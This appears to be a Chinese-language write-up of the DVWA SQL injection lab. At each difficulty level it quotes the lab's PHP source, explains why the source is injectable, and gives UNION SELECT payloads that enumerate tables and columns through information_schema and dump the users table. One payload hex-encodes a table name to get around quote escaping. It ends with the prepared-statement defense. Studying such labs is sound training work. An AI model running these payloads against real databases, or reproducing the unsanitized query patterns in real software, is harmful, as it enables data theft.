难度1-Low
查看代码:
<?php if( isset( $_REQUEST[ ‘Submit‘ ] ) ) { // Get input $id = $_REQUEST[ ‘id‘ ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = ‘$id‘;"; $result = mysql_query( $query ) or die( ‘<pre>‘ . mysql_error() . ‘</pre>‘ ); // Get results $num = mysql_numrows( $result ); $i = 0; while( $i < $num ) { // Get values $first = mysql_result( $result, $i, "first_name" ); $last = mysql_result( $result, $i, "last_name" ); // Feedback for end user echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; // Increase loop count $i++; } mysql_close(); } ?>
直接执行query中的sql语句,没有进行过滤,并且会显示错误
先用order by来测试表中有多少列,当列为3的时候报错了,并且列为2时没有报错,那么该表就有2列
‘ order by 3 #
payload:
‘ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() # //表
‘ union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘users‘ # //列
‘ union select group_concat(first_name),group_concat(last_name) from users # //数据
表
列
数据
难度2-Medium
查看代码:
<?php if( isset( $_POST[ ‘Submit‘ ] ) ) { // Get input $id = $_POST[ ‘id‘ ]; $id = mysql_real_escape_string( $id ); // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = $id;"; $result = mysql_query( $query ) or die( ‘<pre>‘ . mysql_error() . ‘</pre>‘ ); // Get results $num = mysql_numrows( $result ); $i = 0; while( $i < $num ) { // Display values $first = mysql_result( $result, $i, "first_name" ); $last = mysql_result( $result, $i, "last_name" ); // Feedback for end user echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; // Increase loop count $i++; } //mysql_close(); } ?>
在Low的基础上对id进行了mysql_real_escape_string()函数的过滤,并且将GET型注入改为POST型注入,但是此时变量没有用单引号或者双引号包裹
mysql_real_escape_string()函数只是将一些特殊字符转义,虽然这里对单引号和双引号进行了转义,但是在这里时整数型注入
- \x00
- \n
- \r
- \
- ‘
- "
- \x1a
payload:
1+union+select+1,group_concat(table_name)+from+information_schema.tables+where+table_schema=database()# //表
1+union+select+1,group_concat(column_name)+from+information_schema.columns+where+table_schema=database()+and+table_name=0x7573657273# //列,由于单引号被转义,用16进制转换
1+union+select+group_concat(first_name),group_concat(last_name)+from+users# //数据
表
列
数据
难度3-High
查看代码:
<?php if( isset( $_SESSION [ ‘id‘ ] ) ) { // Get input $id = $_SESSION[ ‘id‘ ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = ‘$id‘ LIMIT 1;"; $result = mysql_query( $query ) or die( ‘<pre>Something went wrong.</pre>‘ ); // Get results $num = mysql_numrows( $result ); $i = 0; while( $i < $num ) { // Get values $first = mysql_result( $result, $i, "first_name" ); $last = mysql_result( $result, $i, "last_name" ); // Feedback for end user echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; // Increase loop count $i++; } mysql_close(); } ?>
通过修改session中的id来查询数据库中的内容
如果sql语句产生错误则会输出Something went wrong
payload:
‘ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() # //表 ‘ union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘users‘ # //列 ‘ union select group_concat(first_name),group_concat(last_name) from users # //数据
表
列
数据
Impossible
查看代码:
<?php if( isset( $_GET[ ‘Submit‘ ] ) ) { // Check Anti-CSRF token checkToken( $_REQUEST[ ‘user_token‘ ], $_SESSION[ ‘session_token‘ ], ‘index.php‘ ); // Get input $id = $_GET[ ‘id‘ ]; // Was a number entered? if(is_numeric( $id )) { // Check the database $data = $db->prepare( ‘SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;‘ ); $data->bindParam( ‘:id‘, $id, PDO::PARAM_INT ); $data->execute(); $row = $data->fetch(); // Make sure only 1 result is returned if( $data->rowCount() == 1 ) { // Get values $first = $row[ ‘first_name‘ ]; $last = $row[ ‘last_name‘ ]; // Feedback for end user echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; } } } // Generate Anti-CSRF token generateSessionToken(); ?>
这里对sql注入的防御就是把传入的id内容再进行int判断,只有当id的值为数字时才会在数据库里进行查找